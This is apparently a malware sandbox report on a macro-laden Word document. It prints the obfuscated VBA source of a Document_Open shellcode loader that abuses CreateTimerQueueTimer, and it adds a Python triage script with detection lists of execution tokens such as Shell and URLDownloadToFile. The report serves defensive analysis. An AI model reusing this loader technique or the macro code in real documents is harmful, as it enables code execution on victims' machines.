Verdict: MALICIOUS
Risk Score: 142

Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
The sample is a Word document carrying VBA macros. A Document_Open handler runs as soon as macros are enabled, so no further user interaction is needed, and the static heuristics also flag a GetObject call. The macro source is heavily obfuscated: identifiers are dictionary words, every numeric constant is hidden behind literal arithmetic (for example `seeing = 39 - 80 + 65321`), and junk calls to the VBA financial function Pmt pad the code. What is visible in the extracted source is consistent with in-process shellcode execution rather than a scripted download: braze() pulls a long string out of a form control (`Right(aerobiotic.Name, 7844)`), decodes it with the custom routine biradial (its folded constants are 64, 4096 and 262144, i.e. 2^6, 2^12 and 2^18, with masks 0xFF0000, 0xFF00 and 0xFF, the shape of a Base64-style 4-to-3 unpacking), hands the result to morder.malabo (not shown in the preview), and then calls decapitate, which the second module declares as kernel32 CreateTimerQueueTimer, with `seedtime = upbow + ramshead`, an offset into whatever malabo returned, in the Callback position of that API's signature. Registering a timer-queue callback that points into a decoded buffer is a known way to run shellcode from VBA without Shell or CreateThread, and the Win64/LongPtr conditional compilation keeps the pointer types correct on both 32- and 64-bit Office. The one non-namespace URL was found in the document body text, not in the macro, so on its own it is a weak indicator; the remaining URLs are XML namespace identifiers from embedded image metadata and are not indicators at all.
Heuristics (5)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| VBA macros detected | medium (3 related findings) | OLE_VBA_MACROS | Document contains VBA macro code |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| GetObject call | high | OLE_VBA_GETOBJ | GetObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

Extracted URLs (every one labelled "In document text (OLE body)", i.e. found in the document body, not reached by macro code):
- http://www.eastoftheweb.com/short-stories/UBooks/JereMagi942.shtml
- http://ns.adobe.com/xap/1.0/
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/photoshop/1.0/
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#
- http://schemas.openxmlformats.org/drawingml/2006/main

All but the first are XMP, RDF, Dublin Core and DrawingML namespace URIs that come from image metadata and drawing markup; they appear in virtually any document with embedded pictures and should not be treated as indicators.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10816 bytes | 34e0862698f96ab89445ad5d10bf498d940412f6df28e95e972f5fc7068d9f13 |
Preview: first 1,000 lines of the extracted script (the report truncates it after the start of the second module).

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function biradial(articulately) As String
Dim allantoic(6962) As Byte
Dim baroque As Long
Dim chimakum As Long
Dim despumate() As Byte
Dim beanfeast As Long
Dim harem(63) As Long
Dim barbecue As Long
Dim atelier(63) As Long
Dim illdigested(63) As Long
seeing = 39 - 80 + 65321
aneurysmal = 9 - 112 + 65639
bumper = 7 - 40 + 4129
ectoderm = 45 - 27 + 16711662
Dim capella() As Byte
capella = VBA.StrConv(articulately, 128)
cooks = 5 + 32
Pmt 0, cooks, 7585, 47529, 8
copaiba = 7840 + 3
finem = vbKeyShift - 12
For unauthoritative = (1 - 1) To copaiba * 1
If unauthoritative Mod (6 - 4) = (3 - 3) Then
capella(unauthoritative) = capella(unauthoritative) - finem
Else
capella(unauthoritative) = capella(unauthoritative) - (finem - 1)
End If
Next unauthoritative
sympathectomy = 11 + 51
Pmt 0, sympathectomy, 25280, 57587, 6
uncertain = 107 - 100 - 7
prionace = 80 - 3 - 34
archegenesis = abolishment
For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5)
atelier(beanfeast) = plebiscitum(beanfeast, bumper, 30 + 5)
illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5)
Next beanfeast
breastfed = 39 + 9
Pmt 0, breastfed, 36651, 54834, 2
despumate = capella
grampositive = 18 + 59
Pmt 0, grampositive, 12329, 36386, 3
northwestward = 122 - 24 - 95
enfranchised = 36 - 122 + 88
For barbecue = 0 To copaiba
clay = despumate(barbecue)
belay = despumate(barbecue + 2)
baggala = atelier(archegenesis(despumate(barbecue + 1)))
cupronickel = harem(archegenesis(belay)) + _
archegenesis(despumate(barbecue + northwestward))
baroque = illdigested(archegenesis(clay)) + baggala + cupronickel
beanfeast = plebiscitum(baroque, ectoderm, 20 + 7)
allantoic(chimakum) = plebiscitum(beanfeast, aneurysmal, 10 + 7)
beanfeast = plebiscitum(baroque, seeing, 20 + 7)
allantoic(chimakum + 1) = plebiscitum(beanfeast, (15 - 23 + 264), 10 + 7)
allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7)
chimakum = chimakum + enfranchised + 1
barbecue = barbecue + 3
Next
biradial = allantoic
End Function
Function braze()
unwelcome.hallucinogen.Value = Day(#12/5/2013#)
Set aerobiotic = unwelcome.hallucinogen.SelectedItem
symmetry = 51 + 44
Pmt 0, symmetry, 19244, 48842, 8
whim = aerobiotic.Name
justly = 50 - 49 + 7843
crenulate = Right(whim, justly)
hipless = biradial(crenulate)
footwear = 40 + 48
Pmt 0, footwear, 13324, 17438, 6
#If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then
Dim upbow As LongPtr
Dim seedtime As LongPtr
Dim ploy As LongPtr
Dim fumble As LongPtr
Dim pattern As LongPtr
ramshead = 118 - 128 + 2074
#End If
#If (14 * 4 + 6) > (9 - 4 * 2) And Not (99 - 11 * 9) * 30 < (Win64) Then
Dim seedtime As Long
Dim upbow As Long
Dim ploy As Long
Dim fumble As Long
Dim pattern As Long
ramshead = (14 - 25 + 792) + 3459
#End If
adaptability = 21 + 13
Pmt 0, adaptability, 2073, 45246, 2
melicoccus = 20 + 37
Pmt 0, melicoccus, 29396, 52316, 4
antibacterial = hipless
upbow = morder.malabo(antibacterial)
ploy = 102 - 7 - 95
seedtime = upbow + ramshead
fumble = 63 - 108 + 201572
pattern = 71 - 80 + 3509
balaenicipitidae = decapitate(fumble, _
ploy, seedtime, _
ploy, ploy, ploy, _
ploy)
bonnet = 59 + 1
Pmt 0, bonnet, 13549, 52182, 5
End Function
Private Sub Document_Open()
remissness = "mate"
braze
canaliculated = 9 + 19
Pmt 0, canaliculated, 36418, 18210, 5
End Sub
Attribute VB_Name = "soave"
' Es ist kalt und regungslos  (It is cold and motionless)
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
' Die Nacht öffnet ihren Schoß  (The night opens her womb)
' Ich weiß nicht wie du heißt  (I do not know what your name is)
Public Declare Function decapitate _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (etiolate As ... (truncated)
```
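The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above pairs an auto-execution token with execution tokens, and the preview shows the constant-hiding arithmetic an analyst has to undo before the decoder's masks and shifts become readable. The following triage helper is an added example written for this page; it is not the analyzer's own code and not part of the sample. It folds literal-only arithmetic (and the VBA constant vbKeyShift, whose documented value is 16) and then applies the auto-exec plus execution-token rule. The keyword lists are my own choice, and the embedded input is a trimmed excerpt of the macro source shown in the preview (the truncated Declare line is kept truncated as the report prints it).

```python
"""Fold obfuscating literal arithmetic in VBA source and apply the
auto-exec + execution-token heuristic. Added example, not the report's code."""
import ast
import operator
import re

# Named VBA constants the sample leans on (vbKeyShift = 16 per the VBA docs).
VBA_CONSTS = {"vbKeyShift": "16", "vbKeyControl": "17", "vbKeyMenu": "18"}

_NUM = r"\d+"
_OP = r"\s*[-+*/]\s*"
# A parenthesised run of integer literals and operators, e.g. "(4 - 94 + 154)".
_PAREN_EXPR = re.compile(rf"\(\s*{_NUM}(?:{_OP}{_NUM})+\s*\)")
# A bare run of two or more literals that is not part of a larger expression
# (no operator, identifier, call paren or date-literal '#' on either side),
# e.g. "39 - 80 + 65321" but not the "3 + 4" in "x - 3 + 4".
_BARE_EXPR = re.compile(
    rf"(?<![\w.#)\-+*/])(?<![-+*/]\s){_NUM}(?:{_OP}{_NUM})+(?![\w.#(])(?!\s*[-+*/(])"
)
_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def _eval_arith(expr):
    """Evaluate integer arithmetic via the AST, never eval()."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, int):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](walk(node.left), walk(node.right))
        raise ValueError(f"unsupported node in {expr!r}")
    value = walk(ast.parse(expr, mode="eval"))
    return int(value) if float(value).is_integer() else value


def _fold_match(m):
    try:
        return str(_eval_arith(m.group(0)))
    except (ValueError, SyntaxError, ZeroDivisionError):
        return m.group(0)  # leave anything odd untouched


def fold_constants(src):
    """Replace literal-only arithmetic with its value until nothing changes."""
    for name, value in VBA_CONSTS.items():
        src = re.sub(rf"\b{name}\b", value, src)
    while True:
        new = _BARE_EXPR.sub(_fold_match, _PAREN_EXPR.sub(_fold_match, src))
        if new == src:
            return new
        src = new


def assignments(folded):
    """'name = <int>' lines after folding: the decoder's masks and shifts."""
    return {m.group(1): int(m.group(2))
            for m in re.finditer(r"^\s*(\w+)\s*=\s*(\d+)\s*$", folded, re.M)}


# Heuristic vocabularies (my own lists, modelled on the olevba approach).
AUTOEXEC = re.compile(r"\b(Document_Open|Document_Close|AutoOpen|Auto_Open|"
                      r"AutoExec|AutoClose|Workbook_Open|Workbook_Activate)\b", re.I)
EXEC_TOKENS = {name: re.compile(rx, re.I) for name, rx in {
    "Shell": r"\bShell\b", "CreateObject": r"\bCreateObject\b",
    "GetObject": r"\bGetObject\b",
    "Declare Function": r"\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\b",
    "kernel32 import": r'\bLib\s+"kernel32"',
    "CreateTimerQueueTimer": r"\bCreateTimerQueueTimer\b",
    "CreateThread": r"\bCreateThread\b", "VirtualAlloc": r"\bVirtualAlloc\b",
    "URLDownloadToFile": r"\bURLDownloadToFile\b", "XMLHTTP": r"\bXMLHTTP\b",
}.items()}


def triage(src):
    """Fold constants, then rate: auto-exec AND exec token -> high."""
    folded = fold_constants(src)
    auto = sorted({m.group(0) for m in AUTOEXEC.finditer(folded)})
    execs = sorted(n for n, rx in EXEC_TOKENS.items() if rx.search(folded))
    arch_aware = bool(re.search(r"\bLongPtr\b", folded)
                      and re.search(r"\bWin64\b", folded))
    severity = "high" if auto and execs else "medium" if auto or execs else "low"
    return {"severity": severity, "autoexec": auto, "exec_tokens": execs,
            "arch_aware": arch_aware, "constants": assignments(folded)}


# Constructed input: a trimmed excerpt of the preview above (not the full sample).
SAMPLE = '''Attribute VB_Name = "ThisDocument"
Function biradial(articulately) As String
seeing = 39 - 80 + 65321
aneurysmal = 9 - 112 + 65639
bumper = 7 - 40 + 4129
ectoderm = 45 - 27 + 16711662
copaiba = 7840 + 3
finem = vbKeyShift - 12
For beanfeast = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
harem(beanfeast) = plebiscitum(beanfeast, (4 - 94 + 154), 30 + 5)
illdigested(beanfeast) = plebiscitum(beanfeast, (120 - 41 + 262065), 30 + 5)
Next beanfeast
allantoic(chimakum + enfranchised) = plebiscitum(baroque, (1 - 79 + 333), 20 + 7)
End Function
Function braze()
unwelcome.hallucinogen.Value = Day(#12/5/2013#)
#If (14 * 4 + 6) > (9 - 4 * 2) And (99 - 11 * 9) * 30 < (Win64) Then
Dim upbow As LongPtr
#End If
upbow = morder.malabo(antibacterial)
balaenicipitidae = decapitate(fumble, ploy, seedtime, ploy, ploy, ploy, ploy)
End Function
Private Sub Document_Open()
braze
End Sub
Attribute VB_Name = "soave"
Public Declare Function decapitate Lib "Kernel32" Alias "CreateTimerQueueTimer" (etiolate As ... (truncated)
'''

if __name__ == "__main__":
    print(fold_constants(SAMPLE))
    print(triage(SAMPLE))
```

Run against the excerpt, the folded listing reads `For beanfeast = 0 To 63` and `plebiscitum(beanfeast, 64, 35)`, and the assignment map gives ectoderm = 16711680 (0xFF0000), seeing = 65280 (0xFF00), bumper = 4096 and finem = 4, which is what makes the 4-to-3 decoder structure obvious; the verdict is "high" because Document_Open coincides with the kernel32 Declare and CreateTimerQueueTimer. The bare-run lookbehinds deliberately refuse to fold "3 + 4" inside "x - 3 + 4", since that would silently change the value.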